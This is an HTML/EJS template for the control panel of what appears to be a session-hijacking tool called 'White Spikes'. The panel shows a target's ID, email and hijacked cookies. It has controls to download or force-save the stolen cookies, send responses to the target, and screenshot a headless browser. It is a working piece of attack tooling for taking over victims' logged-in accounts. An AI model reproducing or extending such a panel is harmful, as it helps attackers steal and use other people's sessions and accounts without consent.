<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Panel | WHITE SPIKES</title>
    <link rel="stylesheet" href="/assets/css/main.css">
    <link rel="stylesheet" href="/assets/css/panel.css">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/4.7.4/socket.io.js"
        integrity="sha512-tE1z+95+lMCGwy+9PnKgUSIeHhvioC9lMlI7rLWU0Ps3XTdjRygLcy4mLuL0JAoK4TLdQEyP0yOl/9dMOqpH/Q=="
        crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/1.6.5/axios.min.js"
        integrity="sha512-TjBzDQIDnc6pWyeM1bhMnDxtWH0QpOXMcVooglXrali/Tj7W569/wd4E8EDjk1CwOAOPSJon1VfcEt1BI4xIrA=="
        crossorigin="anonymous" referrerpolicy="no-referrer"></script>

    <script>
        let ID = `<%- data.id %>`
        let appName = `<%- data.appName %>`
    </script>
    <script src="/assets/js/main.js" defer></script>
    <script src="/assets/js/panel.js" defer></script>
</head>

<body>

    <div class="main-container">
        <div class="main-header">
            <div class="left">
                <a href="https://madhanmaaz.netlify.app" target="_blank" rel="noopener noreferrer">
                    <h2><b>@</b>White<span>Spikes</span></h2>
                    <h6>- Created by Madhan</h6>
                </a>
            </div>

            <div class="right">
                <a id="response-btn">
                    <button class="b-btn" title="Response to target">
                        <i class="fa-solid fa-reply"></i>
                    </button>
                </a>

                <a id="database-btn">
                    <button class="b-btn" title="Database">
                        <i class="fa-solid fa-database"></i>
                    </button>
                </a>

                <a id="open-browser-btn">
                    <button class="b-btn" title="Open Data Browser">
                        <i class="fa-brands fa-chrome"></i>
                    </button>
                </a>

                <a href="/panel/download-cookies?id=<%- data.id %>" download="<%- data.id %>.wszip">
                    <button class="b-btn" title="Download Cookies">
                        <i class="fa-solid fa-cookie-bite"></i>
                    </button>
                </a>

                <a id="take-screenshot">
                    <button class="b-btn" title="take screenshot to view the headless browser">
                        <i class="fa-solid fa-image"></i>
                    </button>
                </a>

                <a href="/">
                    <button class="b-btn" title="Home">
                        <i class="fa-solid fa-house"></i>
                    </button>
                </a>
            </div>
        </div>

        <div class="main-content">
            <div class="info active">
                <div class="left">
                    <h4 class="sub">INFORMATION</h4>
                    <pre>ID      : <%- data.id %></pre>
                    <pre>EMAIL   : <%- data.email %></pre>
                    <pre>APPNAME : <%- data.appName %></pre>
                    <pre id="tar-<%- data.id %>-cookies">COOKIES : <%- data.cookies %></pre>
                    <pre>OPTIONS : <button id="force-cookies" class="b-btn" title="force to save cookies"><i class="fa-solid fa-stroopwafel"></i></button> <button id="clear-cookies" class="b-btn" title="clear hijacked cookies"><i class="fa-solid fa-trash"></i></button></pre>
                </div>

                <div class="right" id="mini-log-container">
                    <h4 class="sub">logs</h4>

                </div>
            </div>

            <div class="terminal-box"></div>
        </div>

    </div>

    <section class="dialog database-container">
        <div class="head">
            <h3>Database</h3>

            <div class="left">
                <button class="b-btn">
                    <i class="fa-solid fa-xmark"></i>
                </button>
            </div>
        </div>

        <div class="content"></div>
    </section>

    <section class="dialog response-container">
        <div class="head">
            <h3>Response to target</h3>

            <div class="left">
                <button class="b-btn" id="response-setter">
                    <i class="fa-solid fa-check"></i>
                </button>
                <button class="b-btn">
                    <i class="fa-solid fa-xmark"></i>
                </button>
            </div>
        </div>

        <textarea class="content" placeholder="Response...." id="response-input"><%- data.response %></textarea>
    </section>

    <section class="dialog screenshot-container">
        <div class="head">
            <h3>Screenshot</h3>

            <div class="left">
                <button class="b-btn">
                    <i class="fa-solid fa-xmark"></i>
                </button>
            </div>
        </div>

        <img alt="screenshot failed to load" src="assets/src/banner.jpg">
    </section>
</body>

</html>